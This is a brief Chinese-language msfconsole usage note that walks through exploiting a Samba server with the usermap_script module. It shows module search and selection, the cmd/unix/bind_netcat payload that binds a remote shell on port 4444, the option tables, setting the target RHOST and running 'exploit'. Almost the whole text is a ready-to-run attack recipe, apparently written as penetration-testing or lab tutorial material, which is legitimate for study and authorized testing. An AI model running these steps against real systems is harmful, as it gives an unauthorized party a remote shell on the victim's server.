msfconsole客户端使用说明:
help -- 列出所有命令
search samba -- 搜索攻击samba服务器的模块
use muti/samba/usermap_script 选择该渗透攻击模块;
show payloads -- 搜索usermap_script模块兼容的攻击载荷;
set payload cmd/unix/bind_netcat --使用cmd/unix/bind_netcat载荷,即使用netcat工具在渗透攻击成功后执行shell,
并通过netcat绑定在一个端口上。
show options -- 查看需要配置哪些配置参数;
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- ----------------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/bind_netcat):
Name Current Setting Required Description
---- --------------- -------- ----------------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
ID Name
--- ----
0 Automatic
## 设置攻击主机
set RHOST 10.10.10.254
## 执行渗透命令:
exploit